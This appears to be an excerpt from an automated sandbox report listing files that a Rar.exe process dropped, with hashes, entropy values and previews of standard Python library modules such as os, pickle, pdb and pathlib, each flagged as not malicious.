                                                                                                                                                                                                                                  SHA-512:557557F4BF9A6F238340596AA84F079318F96C44E26804A3083A6359C36BDB6CEF5D5A2D5A698202D36BF6B9C7D0D7625B4E2B72B0A4582A78569E104F9F755A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""..Operator Interface....This module exports a set of functions corresponding to the intrinsic..operators of Python. For example, operator.add(x, y) is equivalent..to the expression x+y. The function names are those used for special..methods; variants without leading and trailing '__' are also provided..for convenience.....This is the pure Python implementation of the module..."""....__all__ = ['abs', 'add', 'and_', 'attrgetter', 'concat', 'contains', 'countOf',.. 'delitem', 'eq', 'floordiv', 'ge', 'getitem', 'gt', 'iadd', 'iand',.. 'iconcat', 'ifloordiv', 'ilshift', 'imatmul', 'imod', 'imul',.. 'index', 'indexOf', 'inv', 'invert', 'ior', 'ipow', 'irshift',.. 'is_', 'is_not', 'isub', 'itemgetter', 'itruediv', 'ixor', 'le',.. 'length_hint', 'lshift', 'lt', 'matmul', 'methodcaller', 'mod',.. 'mul', 'ne', 'neg', 'not_', 'or_', 'pos', 'pow', 'rshift',.. 'setitem', 'sub', 'truediv', 'truth', 'xor']....from builtins im
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):62050
                                                                                                                                                                                                                                  Entropy (8bit):4.459564941363674
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:yG/pFySCc5myk6vLS9021IwMniNxQ5xqSvl:yG/HyfN6o965xlvl
                                                                                                                                                                                                                                  MD5:847CC0387E4999C3B43BCE251DF2DC18
                                                                                                                                                                                                                                  SHA1:E7F6ED46A782655CBF381EC06EA05DEBF5506F4C
                                                                                                                                                                                                                                  SHA-256:5C46C1CCCC32E7778E3AE4F7018D4D713AAA1DBD13210506472C2E6DEE2D4F73
                                                                                                                                                                                                                                  SHA-512:9BFBF93216DAA4628F3D9D248536B26953F029108D928719C1DB5882EDED5BAC5B715FD5E10FBFD43E0EE948CC1730C0917186F23FD8E5ECBC82C8A7755C1360
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""A powerful, extensible, and easy-to-use option parser.....By Greg Ward <gward@python.net>....Originally distributed as Optik.....For support, use the optik-users@lists.sourceforge.net mailing list..(http://lists.sourceforge.net/lists/listinfo/optik-users).....Simple usage example:.... from optparse import OptionParser.... parser = OptionParser().. parser.add_option("-f", "--file", dest="filename",.. help="write report to FILE", metavar="FILE").. parser.add_option("-q", "--quiet",.. action="store_false", dest="verbose", default=True,.. help="don't print status messages to stdout").... (options, args) = parser.parse_args().."""....__version__ = "1.5.3"....__all__ = ['Option',.. 'make_option',.. 'SUPPRESS_HELP',.. 'SUPPRESS_USAGE',.. 'Values',.. 'OptionContainer',.. 'OptionGroup',.. 'OptionParser',.. 'HelpFormatter',.. 'Indented
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):40680
                                                                                                                                                                                                                                  Entropy (8bit):4.577808445819657
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:FTfWsLgH74t1vL5VPkBSP53n4pIiwCepY82y76EM6ED6En6En63686A6xMt1iM/:FTWc1tpaIiwl7
                                                                                                                                                                                                                                  MD5:8180E937086A657D6B15418FF4215C35
                                                                                                                                                                                                                                  SHA1:232E8F00EED28BE655704ECCDAB3E84D66CC8F53
                                                                                                                                                                                                                                  SHA-256:521F714DC038E0FAA53E7DE3DBCCAE0631D96A4D2D655F88B970BD8CF29EC750
                                                                                                                                                                                                                                  SHA-512:A682A8F878791510A27DE3A0E407889D3F37855FB699320B4355B48CB23DE69B89DADD77FDCCA33EF8E5855278E584B8E7947B626D6623C27521D87EAE5A30D5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:r"""OS routines for NT or Posix depending on what system we're on.....This exports:.. - all functions from posix or nt, e.g. unlink, stat, etc... - os.path is either posixpath or ntpath.. - os.name is either 'posix' or 'nt'.. - os.curdir is a string representing the current directory (always '.').. - os.pardir is a string representing the parent directory (always '..').. - os.sep is the (or a most common) pathname separator ('/' or '\\').. - os.extsep is the extension separator (always '.').. - os.altsep is the alternate pathname separator (None or '/').. - os.pathsep is the component separator used in $PATH etc.. - os.linesep is the line separator in text files ('\r' or '\n' or '\r\n').. - os.defpath is the default search path for executables.. - os.devnull is the file path of the null device ('/dev/null', etc.)....Programs that import and use 'os' stand a better chance of being..portable between different platforms. Of course, they must then..only use functions that are
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):51036
                                                                                                                                                                                                                                  Entropy (8bit):4.4519233536876275
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:luuewaM+l9hHaktD7QBq2mM1E0lpijUSiwHYBKDwx:luuew4FH3D7QBne0lQjUSiwHzwx
                                                                                                                                                                                                                                  MD5:296F3A27E6D3758364E1F4925A8AC32E
                                                                                                                                                                                                                                  SHA1:A53DC770A17E23BB66692A44ECD804AA7A3947EF
                                                                                                                                                                                                                                  SHA-256:7500FE2B8C9BE491C44E5F1DBE4D4E3139037305E0465DF69F08E05E74C2DC94
                                                                                                                                                                                                                                  SHA-512:4A13256676D59D8DBDF2353309E5699AFC88B4976F2FC3D710D9BDF132FB2216D3B94B52476F4C3D2D856405A66C3C192853812CBA43B851C034C0215D6A1918
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import fnmatch..import functools..import io..import ntpath..import os..import posixpath..import re..import sys..import warnings..from _collections_abc import Sequence..from errno import EINVAL, ENOENT, ENOTDIR, EBADF, ELOOP..from operator import attrgetter..from stat import S_ISDIR, S_ISLNK, S_ISREG, S_ISSOCK, S_ISBLK, S_ISCHR, S_ISFIFO..from urllib.parse import quote_from_bytes as urlquote_from_bytes......__all__ = [.. "PurePath", "PurePosixPath", "PureWindowsPath",.. "Path", "PosixPath", "WindowsPath",.. ]....#..# Internals..#...._WINERROR_NOT_READY = 21 # drive exists but is not accessible.._WINERROR_INVALID_NAME = 123 # fix for bpo-35306.._WINERROR_CANT_RESOLVE_FILENAME = 1921 # broken symlink pointing to itself....# EBADF - guard against macOS `stat` throwing EBADF.._IGNORED_ERROS = (ENOENT, ENOTDIR, EBADF, ELOOP)...._IGNORED_WINERRORS = (.. _WINERROR_NOT_READY,.. _WINERROR_INVALID_NAME,.. _WINERROR_CANT_RESOLVE_FILENAME)....def _ignore_error(exception):..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):64975
                                                                                                                                                                                                                                  Entropy (8bit):4.3364206659285
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:X/9nCVLsvNyYaNGNxJe5gMhjpGeNgxF2F6e1QliUcWQ36ApxGqfghG9G39pM9zzd:XVnCeI9GeNgxYR+Tmzzd
                                                                                                                                                                                                                                  MD5:46404C083B59F6091A6C037FCCD9AA7E
                                                                                                                                                                                                                                  SHA1:D1DA36307E4222CAA522ED76BA55281FB8E286EE
                                                                                                                                                                                                                                  SHA-256:084615A596B417178C36DA179FE5F106079A184D7F10206137CA1D89B7446D91
                                                                                                                                                                                                                                  SHA-512:455E2FF1AA733AD5CB4A9AB9A5B512C4AFED61EE337084ADBDEF5A45FAA3C432AA01CBF4937E1D98EB1FF80A402393E3085906B33D9C83E582F9A7F4E14922B1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#! /usr/bin/env python3...."""..The Python Debugger Pdb..=======================....To use the debugger in its simplest form:.... >>> import pdb.. >>> pdb.run('<a statement>')....The debugger's prompt is '(Pdb) '. This will stop in the first..function call in <a statement>.....Alternatively, if a statement terminated with an unhandled exception,..you can use pdb's post-mortem facility to inspect the contents of the..traceback:.... >>> <a statement>.. <exception traceback>.. >>> import pdb.. >>> pdb.pm()....The commands recognized by the debugger are listed in the next..section. Most can be abbreviated as indicated; e.g., h(elp) means..that 'help' can be typed as 'h' or 'help' (but not as 'he' or 'hel',..nor as 'H' or 'Help' or 'HELP'). Optional arguments are enclosed in..square brackets. Alternatives in the command syntax are separated..by a vertical bar (|).....A blank line repeats the previous command literally, except for..'list', where
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):66769
                                                                                                                                                                                                                                  Entropy (8bit):4.582827313661204
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:f/It2JPYZKT0egjRsk4jOEFvVNVdA2Kn5YIqEIKyNxzXhln:f/lVT0eg1P4jBvVNfA26SBN1H
                                                                                                                                                                                                                                  MD5:91424AE0A9D1B1AB8074044C19813A21
                                                                                                                                                                                                                                  SHA1:1EE0E43AE3F897734095B2A80D2055A96F84C4EB
                                                                                                                                                                                                                                  SHA-256:6799D6E62B61392A6625297FB02CDE322A64713F4050F9171835D20647F430F9
                                                                                                                                                                                                                                  SHA-512:A76533B62B42816B980E5BAA87F46AF3EF8E944BAC0B6FC5697F35F241FD1F749BBD0801A392F94F4331FF1ED89583313903FBF558535E70CB865921B2BB2505
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Create portable serialized representations of Python objects.....See module copyreg for a mechanism for registering custom picklers...See module pickletools source for extensive comments.....Classes:.... Pickler.. Unpickler....Functions:.... dump(object, file).. dumps(object) -> string.. load(file) -> object.. loads(bytes) -> object....Misc variables:.... __version__.. format_version.. compatible_formats...."""....from types import FunctionType..from copyreg import dispatch_table..from copyreg import _extension_registry, _inverted_registry, _extension_cache..from itertools import islice..from functools import partial..import sys..from sys import maxsize..from struct import pack, unpack..import re..import io..import codecs..import _compat_pickle....__all__ = ["PickleError", "PicklingError", "UnpicklingError", "Pickler",.. "Unpickler", "dump", "dumps", "load", "loads"]....try:.. from _pickle import PickleBuffer.. __all__.append("PickleBuffer"
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):96376
                                                                                                                                                                                                                                  Entropy (8bit):4.70927586282489
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:2eNm/Sv/H0mLaWZ5PZFACL/Vx3yRF6lceF0nL13:2eNmyceE3
                                                                                                                                                                                                                                  MD5:BF481644934BC14B72C7A9CFAF9C0A2E
                                                                                                                                                                                                                                  SHA1:A411AE3DD3AE3DF53B214DB31FC13AB7233554EC
                                                                                                                                                                                                                                  SHA-256:D9BB042BC26DAD7A99D1A1ADB3ACEE7C3E93D8B6F5068B55D9B55B6FF3CCD620
                                                                                                                                                                                                                                  SHA-512:C4C77D5396FA79D671607F8BEFE5ED15C1FCEC1BC306653380608E611383C38E96FEBD07C176308D40A553FDE86EBC1150CD7E2D2586D0067BF28E1343A45718
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:'''"Executable documentation" for the pickle module.....Extensive comments about the pickle protocols and pickle-machine opcodes..can be found here. Some functions meant for external use:....genops(pickle).. Generate all the opcodes in a pickle, as (opcode, arg, position) triples.....dis(pickle, out=None, memo=None, indentlevel=4).. Print a symbolic disassembly of a pickle...'''....import codecs..import io..import pickle..import re..import sys....__all__ = ['dis', 'genops', 'optimize']....bytes_types = pickle.bytes_types....# Other ideas:..#..# - A pickle verifier: read a pickle and check it exhaustively for..# well-formedness. dis() does a lot of this already...#..# - A protocol identifier: examine a pickle and return its protocol number..# (== the highest .proto attr value among all the opcodes in the pickle)...# dis() already prints this info at the end...#..# - A pickle optimizer: for example, tuple-building code is sometimes more..# elaborate than necessary, cater
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9161
                                                                                                                                                                                                                                  Entropy (8bit):4.618151645678958
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:dNkrAzSFOVVuP49BSMIt57PMd3heQim6VmGJbIDhP7W8O6xVSjfvEoebDAMnV/mR:dNkrAzSYVVuE+Hxm0RIP5rhat8Mv
                                                                                                                                                                                                                                  MD5:A812BEB990E7B1DA92F3F62C529CBE61
                                                                                                                                                                                                                                  SHA1:EFDAFCFC9C646CEF34E86A77912D2F8BD42F1486
                                                                                                                                                                                                                                  SHA-256:2C1DEC7CF7DE19B9BE20982F5EA36B3DD0601C1610AF4F07E8F8D4F987CBFCAD
                                                                                                                                                                                                                                  SHA-512:C69F37CF28E0246C50CE85F03B2921AA3F4EAC9291E01C91C1CD493C01774377504E147F731CAADC07ECCB869DB4F331DA13AD814AAD50E37579E3A0F14D13F0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Conversion pipeline templates.....The problem:..------------....Suppose you have some data that you want to convert to another format,..such as from GIF image format to PPM image format. Maybe the..conversion involves several steps (e.g. piping it through compress or..uuencode). Some of the conversion steps may require that their input..is a disk file, others may be able to read standard input; similar for..their output. The input to the entire conversion may also be read..from a disk file or from an open file, and similar for its output.....The module lets you construct a pipeline template by sticking one or..more conversion steps together. It will take care of creating and..removing temporary files if they are necessary to hold intermediate..data. You can then use the template to do conversions from many..different sources to many different destinations. The temporary..file names used are different each time the template is used.....The templates are objects so you can creat
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):25291
                                                                                                                                                                                                                                  Entropy (8bit):4.42914607165026
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:ubpsSPckq/vGkbcgDeywNuTvly2aGqMuUtC+hjx0UtkGG1FIzN1MVhOsV:ubaSP8smkgBNjWz1Fht
                                                                                                                                                                                                                                  MD5:1EEEC51079475A5A1337FC8C5DF7889F
                                                                                                                                                                                                                                  SHA1:409FF02B159BF9941F723193FF52E1227B586022
                                                                                                                                                                                                                                  SHA-256:1C97E98D400D61B3F894A1B014A1E1252EEC2F3D9A8468636A661208E4A7BD05
                                                                                                                                                                                                                                  SHA-512:26DAAA7577241563D7321623942A04B1C55EAE3610214E9505525D47D5EEF2B20BF267C89ED7CB727293618FF00138ED9A53D166D95AFE2B75DF6D46C921C102
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Utilities to support packages."""....from collections import namedtuple..from functools import singledispatch as simplegeneric..import importlib..import importlib.util..import importlib.machinery..import os..import os.path..import sys..from types import ModuleType..import warnings....__all__ = [.. 'get_importer', 'iter_importers', 'get_loader', 'find_loader',.. 'walk_packages', 'iter_modules', 'get_data',.. 'ImpImporter', 'ImpLoader', 'read_code', 'extend_path',.. 'ModuleInfo',..]......ModuleInfo = namedtuple('ModuleInfo', 'module_finder name ispkg')..ModuleInfo.__doc__ = 'A namedtuple with minimal info about a module.'......def _get_spec(finder, name):.. """Return the finder-specific module spec.""".. # Works with legacy finders... try:.. find_spec = finder.find_spec.. except AttributeError:.. loader = finder.find_module(name).. if loader is None:.. return None.. return importlib.util.spec_from_loader(name, loader)..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):43336
                                                                                                                                                                                                                                  Entropy (8bit):4.687857736895332
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:9bc2S92P0OLDrXVNZib4xEsA7GkJp+YafLlD/WG3Tu8HDSCsFwldmPNJOw+2/ln6:62BLDrob436p+VfLlDrS8HDSCsFwTSx6
                                                                                                                                                                                                                                  MD5:F1AB2DC8B6A1B56DF2BA8F98224D0701
                                                                                                                                                                                                                                  SHA1:E9E8C632C64D7E5C0083A05F3BE70ECC5FA6B39D
                                                                                                                                                                                                                                  SHA-256:275B3D17D1F5EF4A0A7D3FCC7D5DBF72422A72CE234EB7C8A9D0D9975F6F70C3
                                                                                                                                                                                                                                  SHA-512:12F82340F2584DFE296D7312CA3228530087CD16AE8FB5F6AB2C75BBAAAD6A56D1629A81981C41A0D33EF7870CAB5AEE752A2E415270E6F7147DCF9E64366E48
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#!/usr/bin/env python3....""" This module tries to retrieve as much platform-identifying data as.. possible. It makes this information available via function APIs..... If called from the command line, it prints the platform.. information concatenated as single string to stdout. The output.. format is useable as part of a filename....."""..# This module is maintained by Marc-Andre Lemburg <mal@egenix.com>...# If you find problems, please submit bug reports/patches via the..# Python bug tracker (http://bugs.python.org) and assign them to "lemburg"...#..# Still needed:..# * support for MS-DOS (PythonDX ?)..# * support for Amiga and other still unsupported platforms running Python..# * support for additional Linux distributions..#..# Many thanks to all those who helped adding platform-specific..# checks (in no particular order):..#..# Charles G Waldman, David Arnold, Gordon McMillan, Ben Darnell,..# Jeff Bauer, Cliff Crawford, Ivan Van Lanin
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29263
                                                                                                                                                                                                                                  Entropy (8bit):4.616853679109559
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:K4FnSsaOu3ywDNAotyQVGdYjzAX1i5vi2R2dLpv68LuSYGXlzBp1yD:bFnSsk3yw9//jzAX1i5vi2R27v68LuSi
                                                                                                                                                                                                                                  MD5:DA68DE2038480FDFFA9BA88E0CD878F1
                                                                                                                                                                                                                                  SHA1:A8182D084E4794564AFE39D6B9D532D28FF20545
                                                                                                                                                                                                                                  SHA-256:934074D9CEABEC70207EDE26C9CEF10A7FFBA720CC9B1A4F40134DF4B702FD51
                                                                                                                                                                                                                                  SHA-512:29F739DF8F5AF4865134458535ED26EBA9BEA10B944C3BB62ED5EF4900A632B385FB6A685898B9A2470E48AF468379C4A4DA5B554952A462E8F277F71015FA16
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:r"""plistlib.py -- a tool to generate and parse MacOSX .plist files.....The property list (.plist) file format is a simple XML pickle supporting..basic object types, like dictionaries, lists, numbers and strings...Usually the top level object is a dictionary.....To write out a plist file, use the dump(value, file)..function. 'value' is the top level object, 'file' is..a (writable) file object.....To parse a plist from a file, use the load(file) function,..with a (readable) file object as the only argument. It..returns the top level object (again, usually a dictionary).....To work with plist data in bytes objects, you can use loads()..and dumps().....Values can be strings, integers, floats, booleans, tuples, lists,..dictionaries (but only with string keys), Data, bytes, bytearray, or..datetime.datetime objects.....Generate Plist example:.... import datetime.. import plistlib.... pl = dict(.. aString = "Doodah",.. aList = ["A", "B", 12, 32.1, [1, 2, 3]],.. a
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15681
                                                                                                                                                                                                                                  Entropy (8bit):4.545608549924057
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:399df9uylT1ZUhRFeOS0DVipTnzr4ZCi2w:N9dUylTma0DVipDzUZCi2w
                                                                                                                                                                                                                                  MD5:8827240702694AD5C2A064103157245C
                                                                                                                                                                                                                                  SHA1:8596D00B1574A06C705A00503DCE496F1E905953
                                                                                                                                                                                                                                  SHA-256:FCA47328C848D2517B797C303910F363CD118D4A57EAFC699EA9BD07E3555DA9
                                                                                                                                                                                                                                  SHA-512:3A9C6E5911C26A9960F1676E449FC267AF9CFD5746B092804CFE43A11B1F68AD624B5AB72A559E759B2F10869D111DB8E58E567E43D0B5CA6B361826DFA475F9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""A POP3 client class.....Based on the J. Myers POP3 draft, Jan. 96.."""....# Author: David Ascher <david_ascher@brown.edu>..# [heavily stealing from nntplib.py]..# Updated: Piers Lauder <piers@cs.su.oz.au> [Jul '97]..# String method conversion and test jig improvements by ESR, February 2001...# Added the POP3_SSL class. Methods loosely based on IMAP_SSL. Hector Urtubia <urtubia@mrbook.org> Aug 2003....# Example (see the test function at the end of this file)....# Imports....import errno..import re..import socket..import sys....try:.. import ssl.. HAVE_SSL = True..except ImportError:.. HAVE_SSL = False....__all__ = ["POP3","error_proto"]....# Exception raised when an error or invalid response is received:....class error_proto(Exception): pass....# Standard Port..POP3_PORT = 110....# POP SSL PORT..POP3_SSL_PORT = 995....# Line terminators (we always output CRLF, but accept any of CRLF, LFCR, LF)..CR = b'\r'..LF = b'\n'..CRLF = CR+LF....# maximal line length when callin
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16792
                                                                                                                                                                                                                                  Entropy (8bit):4.523436713727538
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:o1EBBFYOHeIlLGN2lzfQzfauq63pvTLhDNqbZLtHcpYtD:o1EBB3Lcauq6aZLGp0
                                                                                                                                                                                                                                  MD5:83225ED90D2BCA83319A2A828EEDFD03
                                                                                                                                                                                                                                  SHA1:E8C0C715FEE809981D7FDC1F204580422A27F610
                                                                                                                                                                                                                                  SHA-256:089CA943FE970634B2D9171E19E34CABF2CF7A43D23BD8738A89F334BBD971D4
                                                                                                                                                                                                                                  SHA-512:C8115208CC9E858816BFAF940C3728A2020A7E5794371E73596DF1A90B1A668A037BA2B5419A96685B375B0390E94C989E860F53D54F2556BE7F7369976D658F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Common operations on Posix pathnames.....Instead of importing this module directly, import os and refer to..this module as os.path. The "os.path" name is an alias for this..module on Posix systems; on other systems (e.g. Windows),..os.path provides the same operations in a manner specific to that..platform, and is an alias to another module (e.g. ntpath).....Some of this can actually be useful on non-Posix systems too, e.g...for manipulation of the pathname component of URLs..."""....# Strings representing various path-related bits and pieces...# These are primarily for export; internally, they are hardcoded...# Should be set before imports for resolving cyclic dependency...curdir = '.'..pardir = '..'..extsep = '.'..sep = '/'..pathsep = ':'..defpath = '/bin:/usr/bin'..altsep = None..devnull = '/dev/null'....import os..import sys..import stat..import genericpath..from genericpath import *....__all__ = ["normcase","isabs","join","splitdrive","split","splitext",.. "basename"
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):25114
                                                                                                                                                                                                                                  Entropy (8bit):4.322203919874031
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:0zJwB8YxVSFKCbM7mDO9dcqaDmQnfxRW9VguPxWLgB:0zJwKY7CbVDgiTWVxW4
                                                                                                                                                                                                                                  MD5:2DC4035AC114107D8B13E39958938960
                                                                                                                                                                                                                                  SHA1:EF2565CAFCAD5FF6E795748DD913DA4A5ABD482D
                                                                                                                                                                                                                                  SHA-256:0905D7CD070A291A506B1B2CC46DADC85007C2739D9BF2F1DCDE01A9C1679821
                                                                                                                                                                                                                                  SHA-512:53554A133380028FBD70613E52172DDCBA74CED0F02ADB974C49149EAC574198309595C8FCE10763316ED0CCD1D35C1672D9EDBBC3D42F518B9B782CCBD12B8E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Author: Fred L. Drake, Jr...# fdrake@acm.org..#..# This is a simple little module I wrote to make life easier. I didn't..# see anything quite like it in the library, though I may have overlooked..# something. I wrote this when I was trying to read some heavily nested..# tuples with fairly non-descriptive content. This is modeled very much..# after Lisp/Scheme - style pretty-printing of lists. If you find it..# useful, thank small children who sleep at night....."""Support to pretty-print lists, tuples, & dictionaries recursively.....Very simple, but useful, especially in debugging data structures.....Classes..-------....PrettyPrinter().. Handle pretty-printing operations onto a stream using a configured.. set of formatting parameters.....Functions..---------....pformat().. Format a Python object into a pretty-printed representation.....pprint().. Pretty-print a Python object to a stream [default is sys.stdout].....saferepr().. Generate a '
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23481
                                                                                                                                                                                                                                  Entropy (8bit):4.4456903061634785
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:eQG31DiWobPzKZNVKtSG/6stsZhCs7SJ4ATp9FJ8sxCCxZhlklCB7xz7N2:ej1DizbGZNZG/ics7YTp9FJ8sxCCRel3
                                                                                                                                                                                                                                  MD5:5B9AA68D3E57EAEA89D8183F2A0C543D
                                                                                                                                                                                                                                  SHA1:84422184D267F877C5266E5A62901F60828AEB4E
                                                                                                                                                                                                                                  SHA-256:3307B50C8E87ED3508340B455C371BFA6B148898D66FF8F0AD3D47EBF27E869E
                                                                                                                                                                                                                                  SHA-512:9187A6A20064E29BDE5292BDC5BCD20B62DF7EAE949D8CD4A8B79E2E169D9FA5559C89187CFE6B308FB990F30BF1B06BA01B3D75F71A152DBC79E414E73B4297
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#! /usr/bin/env python3..#..# Class for profiling python code. rev 1.0 6/2/94..#..# Written by James Roskind..# Based on prior profile module by Sjoerd Mullender.....# which was hacked somewhat by: Guido van Rossum...."""Class for profiling Python code."""....# Copyright Disney Enterprises, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,..# either express or implied. See the License for the specific language..# governing permissions and limitations under the License.......import sys..import time..import marshal....__all__ = ["run", "runctx"
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30105
                                                                                                                                                                                                                                  Entropy (8bit):4.33706442701786
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:oQG3E09NURDhs71UDrLgxAELHsvKSGdRo0t1O9dKPSJ0HXA6Erqr9roMBXLvZr8m:ojN9mhsLxAkduKPSOC0h
                                                                                                                                                                                                                                  MD5:A709BCFBB2850262429D9FABBE67ABC7
                                                                                                                                                                                                                                  SHA1:F02F963B567628F83D2AC5AC4246356140A85AE0
                                                                                                                                                                                                                                  SHA-256:E1512CB76993E2113B3086CC61D1683ED9CE366C350D39D21A6BCBD222D8C660
                                                                                                                                                                                                                                  SHA-512:734B996B4844A476187EF4D5F7C9534CDC79E8F12AD03E419C0CBF873F71D85DA85B3180B4636D2451A70FA11817A7D344CDB29FBCBE8EE89966E9BBA8A74E60
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Class for printing reports on profiled python code."""....# Written by James Roskind..# Based on prior profile module by Sjoerd Mullender.....# which was hacked somewhat by: Guido van Rossum....# Copyright Disney Enterprises, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,..# either express or implied. See the License for the specific language..# governing permissions and limitations under the License.......import sys..import os..import time..import marshal..import re....from enum import Enum..from functools import cmp_to_key..from datacl
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5400
                                                                                                                                                                                                                                  Entropy (8bit):4.632984387456067
                                                                                                                                                                                                                                  Encrypted:false
